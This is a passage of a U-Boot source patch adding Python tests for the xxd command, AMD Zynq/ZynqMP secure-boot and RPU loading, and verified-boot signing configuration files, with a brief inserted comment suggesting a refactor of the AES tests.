+ ubman.restart_uboot() diff --git a/test/py/tests/test_xxd/conftest.py b/test/py/tests/test_xxd/conftest.py new file mode 100644 index 00000000000..47c7cce1aa9 --- /dev/null +++ b/test/py/tests/test_xxd/conftest.py @@ -0,0 +1,36 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Fixture for xxd command test +""" + +import os +import shutil +from subprocess import check_call, CalledProcessError +import pytest + +@pytest.fixture(scope='session') +def xxd_data(u_boot_config): + """Set up a file system to be used in xxd tests + + Args: + u_boot_config -- U-Boot configuration. + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_xxd' + image_path = u_boot_config.persistent_data_dir + '/xxd.img' + + try: + os.mkdir(mnt_point, mode = 0o755) + + with open(mnt_point + '/hello', 'w', encoding = 'ascii') as file: + file.write('hello world\n\x00\x01\x02\x03\x04\x05') + + check_call(f'virt-make-fs --partition=gpt --size=+1M --type=vfat {mnt_point} {image_path}', + shell=True) + + yield image_path + except CalledProcessError: + pytest.skip('Setup failed') + finally: + shutil.rmtree(mnt_point) + if os.path.exists(image_path): + os.remove(image_path) diff --git a/test/py/tests/test_xxd/test_xxd.py b/test/py/tests/test_xxd/test_xxd.py new file mode 100644 index 00000000000..c04bf8b7a25 --- /dev/null +++ b/test/py/tests/test_xxd/test_xxd.py @@ -0,0 +1,23 @@ +# SPDX-License-Identifier: GPL-2.0+ + +""" Unit test for xxd command +""" + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_xxd') +def test_xxd(ubman, xxd_data): + """ Unit test for xxd + + Args: + ubman -- U-Boot console + xxd_data -- Path to the disk image used for testing. + """ + response = ubman.run_command_list([ + f'host bind 0 {xxd_data}', + 'xxd host 0 hello']) + + assert '00000000: 68 65 6c 6c 6f 20 77 6f 72 6c 64 0a 00 01 02 03 hello world.....\r\r\n' + \ + '00000010: 04 05 ..' \ + in response diff --git a/test/py/tests/test_zynq_secure.py b/test/py/tests/test_zynq_secure.py new file mode 100644 index 00000000000..f066a03b182 --- /dev/null +++ b/test/py/tests/test_zynq_secure.py @@ -0,0 +1,190 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import re +import utils +import test_net + +""" +This test verifies different type of secure boot images to authentication and +decryption using AES and RSA features for AMD's Zynq SoC. + +Note: This test relies on boardenv_* containing configuration values to define +the network available and files to be used for testing. Without this, this test +will be automatically skipped. It also relies on dhcp or setup_static net test +to support tftp to load files from a TFTP server. + +For example: + +# Details regarding the files that may be read from a TFTP server and addresses +# and size for aes and rsa cases respectively. This variable may be omitted or +# set to None if zynqmp secure testing is not possible or desired. 
+env__zynq_aes_readable_file = { + 'fn': 'zynq_aes_image.bin', + 'fnbit': 'zynq_aes_bit.bin', + 'fnpbit': 'zynq_aes_par_bit.bin', + 'srcaddr': 0x1000000, + 'dstaddr': 0x2000000, + 'dstlen': 0x1000000, +} + +env__zynq_rsa_readable_file = { + 'fn': 'zynq_rsa_image.bin', + 'fninvalid': 'zynq_rsa_image_invalid.bin', + 'srcaddr': 0x1000000, +} +""" + +def zynq_secure_pre_commands(ubman): + output = ubman.run_command('print modeboot') + if not 'modeboot=' in output: + pytest.skip('bootmode cannnot be determined') + m = re.search('modeboot=(.+?)boot', output) + if not m: + pytest.skip('bootmode cannnot be determined') + bootmode = m.group(1) + if bootmode == 'jtag': + pytest.skip('skipping due to jtag bootmode') + +@pytest.mark.buildconfigspec('cmd_zynq_aes') +def test_zynq_aes_image(ubman): + f = ubman.config.env.get('env__zynq_aes_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure aes case to read') + + dstaddr = f.get('dstaddr', None) + if not dstaddr: + pytest.skip('No dstaddr specified in env file to read') + + dstsize = f.get('dstlen', None) + if not dstsize: + pytest.skip('No dstlen specified in env file to read') + + zynq_secure_pre_commands(ubman) + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = utils.find_ram_base(ubman) + + expected_tftp = 'Bytes transferred = ' + fn = f['fn'] + output = ubman.run_command('tftpboot %x %s' % (srcaddr, fn)) + assert expected_tftp in output + + expected_op = 'zynq aes [operation type] <srcaddr>' + output = ubman.run_command( + 'zynq aes %x $filesize %x %x' % (srcaddr, dstaddr, dstsize) + ) + assert expected_op not in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_zynq_aes') +def test_zynq_aes_bitstream(ubman): + f = ubman.config.env.get('env__zynq_aes_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure aes case to read') + + zynq_secure_pre_commands(ubman) + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = utils.find_ram_base(ubman) + + expected_tftp = 'Bytes transferred = ' + fn = f['fnbit'] + output = ubman.run_command('tftpboot %x %s' % (srcaddr, fn)) + assert expected_tftp in output + + expected_op = 'zynq aes [operation type] <srcaddr>' + output = ubman.run_command( + 'zynq aes load %x $filesize' % (srcaddr) + ) + assert expected_op not in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_zynq_aes') +def test_zynq_aes_partial_bitstream(ubman): + f = ubman.config.env.get('env__zynq_aes_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure aes case to read') + + zynq_secure_pre_commands(ubman) + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = utils.find_ram_base(ubman) + + expected_tftp = 'Bytes transferred = ' + fn = f['fnpbit'] + output = ubman.run_command('tftpboot %x %s' % (srcaddr, fn)) + assert expected_tftp in output + + expected_op = 'zynq aes [operation type] <srcaddr>' + output = ubman.run_command('zynq aes loadp %x $filesize' % (srcaddr)) + assert expected_op not in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + 
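The three AES cases above share the same pattern: tftp the file, run 'zynq aes', then check that the usage text did not appear and that the return code is 0. A helper along these lines could factor out the final checks (purely illustrative; assert_zynq_aes_ok() is not part of this patch):

def assert_zynq_aes_ok(ubman, cmd):
    """Run a 'zynq aes ...' command and assert that it was accepted (sketch only)"""
    usage = 'zynq aes [operation type] <srcaddr>'
    output = ubman.run_command(cmd)
    assert usage not in output                         # usage text means the command was rejected
    assert ubman.run_command('echo $?').endswith('0')  # non-zero return code means failure

# e.g. assert_zynq_aes_ok(ubman, 'zynq aes load %x $filesize' % srcaddr)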
+@pytest.mark.buildconfigspec('cmd_zynq_rsa') +def test_zynq_rsa_image(ubman): + f = ubman.config.env.get('env__zynq_rsa_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure rsa case to read') + + zynq_secure_pre_commands(ubman) + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = utils.find_ram_base(ubman) + + expected_tftp = 'Bytes transferred = ' + fn = f['fn'] + output = ubman.run_command('tftpboot %x %s' % (srcaddr, fn)) + assert expected_tftp in output + + expected_op = 'zynq rsa <baseaddr>' + output = ubman.run_command('zynq rsa %x ' % (srcaddr)) + assert expected_op not in output + output = ubman.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_zynq_rsa') +def test_zynq_rsa_image_invalid(ubman): + f = ubman.config.env.get('env__zynq_rsa_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynq secure rsa case to read') + + zynq_secure_pre_commands(ubman) + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + + srcaddr = f.get('srcaddr', None) + if not srcaddr: + addr = utils.find_ram_base(ubman) + + expected_tftp = 'Bytes transferred = ' + fninvalid = f['fninvalid'] + output = ubman.run_command('tftpboot %x %s' % (srcaddr, fninvalid)) + assert expected_tftp in output + + expected_op = 'zynq rsa <baseaddr>' + output = ubman.run_command('zynq rsa %x ' % (srcaddr)) + assert expected_op in output + output = ubman.run_command('echo $?') + assert not output.endswith('0') diff --git a/test/py/tests/test_zynqmp_rpu.py b/test/py/tests/test_zynqmp_rpu.py new file mode 100644 index 00000000000..cda8c9203b7 --- /dev/null +++ b/test/py/tests/test_zynqmp_rpu.py @@ -0,0 +1,222 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import random +import string +import test_net + +""" +Note: This test relies on boardenv_* containing configuration values to define +RPU applications information for AMD's ZynqMP SoC which contains, application +names, processors, address where it is built, expected output and the tftp load +addresses. This test will be automatically skipped without this. + +It also relies on dhcp or setup_static net test to support tftp to load +application on DDR. All the environment parameters are stored sequentially. +The length of all parameters values should be same. For example, if 2 app_names +are defined in a list as a value of parameter 'app_name' then the other +parameters value also should have a list with 2 items. +It will run RPU cases for all the applications defined in boardenv_* +configuration file. 
+ +Example: +env__zynqmp_rpu_apps = { + 'app_name': ['hello_world_r5_0_ddr.elf', 'hello_world_r5_1_ddr.elf'], + 'proc': ['rpu0', 'rpu1'], + 'cpu_num': [4, 5], + 'addr': [0xA00000, 0xB00000], + 'output': ['Successfully ran Hello World application on DDR from RPU0', + 'Successfully ran Hello World application on DDR from RPU1'], + 'tftp_addr': [0x100000, 0x200000], +} +""" + +# Get rpu apps params from env +def get_rpu_apps_env(ubman): + rpu_apps = ubman.config.env.get('env__zynqmp_rpu_apps', False) + if not rpu_apps: + pytest.skip('ZynqMP RPU application info not defined!') + + apps = rpu_apps.get('app_name', None) + if not apps: + pytest.skip('No RPU application found!') + + procs = rpu_apps.get('proc', None) + if not procs: + pytest.skip('No RPU application processor provided!') + + cpu_nums = rpu_apps.get('cpu_num', None) + if not cpu_nums: + pytest.skip('No CPU number for respective processor provided!') + + addrs = rpu_apps.get('addr', None) + if not addrs: + pytest.skip('No RPU application build address found!') + + outputs = rpu_apps.get('output', None) + if not outputs: + pytest.skip('Expected output not found!') + + tftp_addrs = rpu_apps.get('tftp_addr', None) + if not tftp_addrs: + pytest.skip('TFTP address to load application not found!') + + return apps, procs, cpu_nums, addrs, outputs, tftp_addrs + +# Check return code +def ret_code(ubman): + return ubman.run_command('echo $?') + +# Initialize tcm +def tcminit(ubman, rpu_mode): + output = ubman.run_command(f'zynqmp tcminit {rpu_mode}') + assert 'Initializing TCM overwrites TCM content' in output + return ret_code(ubman) + +# Load application in DDR +def load_app_ddr(ubman, tftp_addr, app): + output = ubman.run_command('tftpboot %x %s' % (tftp_addr, app)) + assert 'TIMEOUT' not in output + assert 'Bytes transferred = ' in output + + # Load elf + ubman.run_command('bootelf -p %x' % tftp_addr) + assert ret_code(ubman).endswith('0') + +# Disable cpus +def disable_cpus(ubman, cpu_nums): + for num in cpu_nums: + ubman.run_command(f'cpu {num} disable') + +# Get random RPU mode between string and integer +def get_rpu_mode(rpu_mode): + if rpu_mode == 0 or rpu_mode == 'lockstep': + return random.choice(['lockstep', 0]) + elif rpu_mode == 1 or rpu_mode == 'split': + return random.choice(['split', 1]) + +# Load apps on RPU cores +def rpu_apps_load(ubman, rpu_mode): + apps, procs, cpu_nums, addrs, outputs, tftp_addrs = get_rpu_apps_env( + ubman) + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + + try: + assert tcminit(ubman, get_rpu_mode(rpu_mode)).endswith('0') + + for i in range(len(apps)): + if rpu_mode == 'lockstep' and procs[i] != 'rpu0': + continue + + load_app_ddr(ubman, tftp_addrs[i], apps[i]) + rel_addr = hex(int(addrs[i] + 0x3C)) + + # Release cpu at app load address + cpu_num = cpu_nums[i] + cmd = f'cpu {cpu_num} release {rel_addr} {rpu_mode}' + output = ubman.run_command(cmd) + exp_op = f'Using TCM jump trampoline for address {rel_addr}' + assert exp_op in output + assert f'R5 {rpu_mode} mode' in output + ubman.wait_for(outputs[i]) + assert ret_code(ubman).endswith('0') + finally: + disable_cpus(ubman, cpu_nums) + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_rpu_app_load_split(ubman): + rpu_apps_load(ubman, 'split') + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_rpu_app_load_lockstep(ubman): + rpu_apps_load(ubman, 'lockstep') + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_rpu_app_load_negative(ubman): + apps, procs, cpu_nums, 
addrs, outputs, tftp_addrs = get_rpu_apps_env( + ubman) + + # Invalid commands + rand_str = ''.join(random.choices(string.ascii_lowercase, k=4)) + rand_num = random.randint(2, 100) + inv_modes = ['mode', rand_str, rand_num, 'splittt', 'locksteppp', '00', 11] + + for mode in inv_modes: + ubman.run_command(f'zynqmp tcminit {mode}') + assert ret_code(ubman).endswith('1') + + test_net.test_net_dhcp(ubman) + if not test_net.net_set_up: + test_net.test_net_setup_static(ubman) + + try: + rpu_mode = 'split' + assert tcminit(ubman, get_rpu_mode(rpu_mode)).endswith('0') + + inv_modes += [0, 1] + for i in range(len(apps)): + load_app_ddr(ubman, tftp_addrs[i], apps[i]) + + # Run in split mode at different load address + rel_addr = hex(int(addrs[i]) + random.randint(200, 1000)) + cpu_num = cpu_nums[i] + cmd = f'cpu {cpu_num} release {rel_addr} {rpu_mode}' + output = ubman.run_command(cmd) + exp_op = f'Using TCM jump trampoline for address {rel_addr}' + assert exp_op in output + assert f'R5 {rpu_mode} mode' in output + assert not outputs[i] in output + + # Invalid rpu mode + for mode in inv_modes: + cmd = f'cpu {cpu_num} release {rel_addr} {mode}' + output = ubman.run_command(cmd) + assert exp_op in output + assert f'Unsupported mode' in output + assert not ret_code(ubman).endswith('0') + + # Switch to lockstep mode, without disabling CPUs + rpu_mode = 'lockstep' + output = ubman.run_command( + f'zynqmp tcminit {get_rpu_mode(rpu_mode)}' + ) + assert 'ERROR: ' in output + + # Disable cpus + disable_cpus(ubman, cpu_nums) + + # Switch to lockstep mode, after disabling CPUs + output = ubman.run_command( + f'zynqmp tcminit {get_rpu_mode(rpu_mode)}' + ) + assert 'Initializing TCM overwrites TCM content' in output + assert ret_code(ubman).endswith('0') + + # Run lockstep mode for RPU1/RPU0 + for i in range(len(apps)): + load_app_ddr(ubman, tftp_addrs[i], apps[i]) + rel_addr = hex(int(addrs[i] + 0x3C)) + cpu_num = cpu_nums[i] + cmd = f'cpu {cpu_num} release {rel_addr} {rpu_mode}' + output = ubman.run_command(cmd) + exp_op = f'Using TCM jump trampoline for address {rel_addr}' + assert exp_op in output + + if procs[i] == 'rpu1': + assert 'Lockstep mode should run on ZYNQMP_CORE_RPU0' in output + assert not ret_code(ubman).endswith('0') + elif procs[i] == 'rpu0': + assert f'R5 {rpu_mode} mode' in output + ubman.wait_for(outputs[i]) + assert ret_code(ubman).endswith('0') + else: + assert False, 'ERROR: Invalid processor!' + finally: + disable_cpus(ubman, cpu_nums) + # This forces the console object to be shutdown, so any subsequent test + # will reset the board back into U-Boot. + ubman.drain_console() + ubman.cleanup_spawn() diff --git a/test/py/tests/test_zynqmp_secure.py b/test/py/tests/test_zynqmp_secure.py new file mode 100644 index 00000000000..c057e36383f --- /dev/null +++ b/test/py/tests/test_zynqmp_secure.py @@ -0,0 +1,104 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import re +import utils +import test_net + +""" +This test verifies different type of secure boot images loaded at the DDR for +AMD's ZynqMP SoC. + +Note: This test relies on boardenv_* containing configuration values to define +the files to be used for testing. Without this, this test will be automatically +skipped. It also relies on dhcp or setup_static net test to support tftp to +load files from a TFTP server. + +For example: + +# Details regarding the files that may be read from a TFTP server. 
This
+# variable may be omitted or set to None if zynqmp secure testing is not
+# possible or desired.
+env__zynqmp_secure_readable_file = {
+    'fn': 'auth_bhdr_ppk1.bin',
+    'enckupfn': 'auth_bhdr_enc_kup_load.bin',
+    'addr': 0x1000000,
+    'keyaddr': 0x100000,
+    'keyfn': 'aes.txt',
+}
+"""
+
+@pytest.mark.buildconfigspec('cmd_zynqmp')
+def test_zynqmp_secure_boot_image(ubman):
+    """This test verifies a secure boot image at the DDR address for the
+    authentication-only case.
+    """
+
+    f = ubman.config.env.get('env__zynqmp_secure_readable_file', None)
+    if not f:
+        pytest.skip('No TFTP readable file for zynqmp secure cases to read')
+
+    test_net.test_net_dhcp(ubman)
+    if not test_net.net_set_up:
+        test_net.test_net_setup_static(ubman)
+
+    addr = f.get('addr', None)
+    if not addr:
+        addr = utils.find_ram_base(ubman)
+
+    expected_tftp = 'Bytes transferred = '
+    fn = f['fn']
+    output = ubman.run_command('tftpboot %x %s' % (addr, fn))
+    assert expected_tftp in output
+
+    output = ubman.run_command('zynqmp secure %x $filesize' % (addr))
+    assert 'Verified image at' in output
+    ver_addr = re.search(r'Verified image at 0x(.+)', output).group(1)
+    output = ubman.run_command('echo $?')
+    assert output.endswith('0')
+    output = ubman.run_command('print zynqmp_verified_img_addr')
+    assert f'zynqmp_verified_img_addr={ver_addr}' in output
+    assert 'Error' not in output
+
+
+@pytest.mark.buildconfigspec('cmd_zynqmp')
+def test_zynqmp_secure_boot_img_kup(ubman):
+    """This test verifies a secure boot image at the DDR address for the
+    encryption-with-kup-key case.
+    """
+
+    f = ubman.config.env.get('env__zynqmp_secure_readable_file', None)
+    if not f:
+        pytest.skip('No TFTP readable file for zynqmp secure cases to read')
+
+    test_net.test_net_dhcp(ubman)
+    if not test_net.net_set_up:
+        test_net.test_net_setup_static(ubman)
+
+    keyaddr = f.get('keyaddr', None)
+    if not keyaddr:
+        keyaddr = utils.find_ram_base(ubman)
+    expected_tftp = 'Bytes transferred = '
+    keyfn = f['keyfn']
+    output = ubman.run_command('tftpboot %x %s' % (keyaddr, keyfn))
+    assert expected_tftp in output
+
+    addr = f.get('addr', None)
+    if not addr:
+        addr = utils.find_ram_base(ubman)
+    expected_tftp = 'Bytes transferred = '
+    fn = f['enckupfn']
+    output = ubman.run_command('tftpboot %x %s' % (addr, fn))
+    assert expected_tftp in output
+
+    output = ubman.run_command(
+        'zynqmp secure %x $filesize %x' % (addr, keyaddr)
+    )
+    assert 'Verified image at' in output
+    ver_addr = re.search(r'Verified image at 0x(.+)', output).group(1)
+    output = ubman.run_command('echo $?')
+    assert output.endswith('0')
+    output = ubman.run_command('print zynqmp_verified_img_addr')
+    assert f'zynqmp_verified_img_addr={ver_addr}' in output
+    assert 'Error' not in output
diff --git a/test/py/tests/vboot/hash-images.its b/test/py/tests/vboot/hash-images.its
new file mode 100644
index 00000000000..3ff797288c2
--- /dev/null
+++ b/test/py/tests/vboot/hash-images.its
@@ -0,0 +1,76 @@
+/dts-v1/;
+
+/ {
+	description = "Chrome OS kernel image with one or more FDT blobs";
+	#address-cells = <1>;
+
+	images {
+		kernel {
+			data = /incbin/("test-kernel.bin");
+			type = "kernel_noload";
+			arch = "sandbox";
+			os = "linux";
+			compression = "none";
+			load = <0x4>;
+			entry = <0x8>;
+			kernel-version = <1>;
+			hash-0 {
+				algo = "crc16-ccitt";
+			};
+			hash-1 {
+				algo = "crc32";
+			};
+			hash-2 {
+				algo = "md5";
+			};
+			hash-3 {
+				algo = "sha1";
+			};
+			hash-4 {
+				algo = "sha256";
+			};
+			hash-5 {
+				algo = "sha384";
+			};
+			hash-6 {
+				algo = "sha512";
+			};
+		};
+		fdt-1 {
+			description = "snow";
+			data = 
/incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-0 { + algo = "crc16-ccitt"; + }; + hash-1 { + algo = "crc32"; + }; + hash-2 { + algo = "md5"; + }; + hash-3 { + algo = "sha1"; + }; + hash-4 { + algo = "sha256"; + }; + hash-5 { + algo = "sha384"; + }; + hash-6 { + algo = "sha512"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-binman-pss.dts b/test/py/tests/vboot/sandbox-binman-pss.dts new file mode 100644 index 00000000000..56e3a42fa6f --- /dev/null +++ b/test/py/tests/vboot/sandbox-binman-pss.dts @@ -0,0 +1,25 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + #address-cells = <1>; + #size-cells = <1>; + + binman { + filename = "sandbox.img"; + + pre-load { + content = <&image>; + algo-name = "sha256,rsa2048"; + padding-name = "pss"; + key-name = "dev.key"; + header-size = <4096>; + version = <1>; + }; + + image: blob-ext { + filename = "test.fit"; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-binman.dts b/test/py/tests/vboot/sandbox-binman.dts new file mode 100644 index 00000000000..b24aeba0fa8 --- /dev/null +++ b/test/py/tests/vboot/sandbox-binman.dts @@ -0,0 +1,24 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + #address-cells = <1>; + #size-cells = <1>; + + binman { + filename = "sandbox.img"; + + pre-load { + content = <&image>; + algo-name = "sha256,rsa2048"; + key-name = "dev.key"; + header-size = <4096>; + version = <1>; + }; + + image: blob-ext { + filename = "test.fit"; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-kernel.dts b/test/py/tests/vboot/sandbox-kernel.dts new file mode 100644 index 00000000000..a1e853c9caa --- /dev/null +++ b/test/py/tests/vboot/sandbox-kernel.dts @@ -0,0 +1,7 @@ +/dts-v1/; + +/ { + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + +}; diff --git a/test/py/tests/vboot/sandbox-u-boot-global-pss.dts b/test/py/tests/vboot/sandbox-u-boot-global-pss.dts new file mode 100644 index 00000000000..c59a68221b9 --- /dev/null +++ b/test/py/tests/vboot/sandbox-u-boot-global-pss.dts @@ -0,0 +1,28 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + + binman { + }; + + reset@0 { + compatible = "sandbox,reset"; + }; + + image { + pre-load { + sig { + algo-name = "sha256,rsa2048"; + padding-name = "pss"; + signature-size = <256>; + mandatory = "yes"; + + key-name = "dev"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-u-boot-global.dts b/test/py/tests/vboot/sandbox-u-boot-global.dts new file mode 100644 index 00000000000..1409f9e1a10 --- /dev/null +++ b/test/py/tests/vboot/sandbox-u-boot-global.dts @@ -0,0 +1,27 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + + binman { + }; + + reset@0 { + compatible = "sandbox,reset"; + }; + + image { + pre-load { + sig { + algo-name = "sha256,rsa2048"; + signature-size = <256>; + mandatory = "yes"; + + key-name = "dev"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-u-boot.dts b/test/py/tests/vboot/sandbox-u-boot.dts new file mode 100644 index 00000000000..5809c62fc1c --- /dev/null +++ b/test/py/tests/vboot/sandbox-u-boot.dts @@ -0,0 +1,13 @@ +/dts-v1/; + +/ { + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + + binman { + }; + + reset@0 { + compatible = "sandbox,reset"; + }; +}; diff --git 
a/test/py/tests/vboot/sign-configs-algo-arg.its b/test/py/tests/vboot/sign-configs-algo-arg.its new file mode 100644 index 00000000000..3a5bb6d0f73 --- /dev/null +++ b/test/py/tests/vboot/sign-configs-algo-arg.its @@ -0,0 +1,44 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha1-pss.its b/test/py/tests/vboot/sign-configs-sha1-pss.its new file mode 100644 index 00000000000..72a5637e3a1 --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha1-pss.its @@ -0,0 +1,46 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha1"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha1"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha1,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha1.its b/test/py/tests/vboot/sign-configs-sha1.its new file mode 100644 index 00000000000..d8bc1fa0919 --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha1.its @@ -0,0 +1,45 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha1"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha1"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha1,rsa2048"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha256-pss-prod.its b/test/py/tests/vboot/sign-configs-sha256-pss-prod.its new file mode 100644 index 00000000000..aac732e304c --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha256-pss-prod.its @@ -0,0 +1,46 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + 
kernel-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha256,rsa2048"; + padding = "pss"; + key-name-hint = "prod"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha256-pss.its b/test/py/tests/vboot/sign-configs-sha256-pss.its new file mode 100644 index 00000000000..7bdcc7e286f --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha256-pss.its @@ -0,0 +1,46 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha256,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha256.its b/test/py/tests/vboot/sign-configs-sha256.its new file mode 100644 index 00000000000..f5591aad305 --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha256.its @@ -0,0 +1,45 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha256,rsa2048"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha384.its b/test/py/tests/vboot/sign-configs-sha384.its new file mode 100644 index 00000000000..2869401991e --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha384.its @@ -0,0 +1,45 @@ 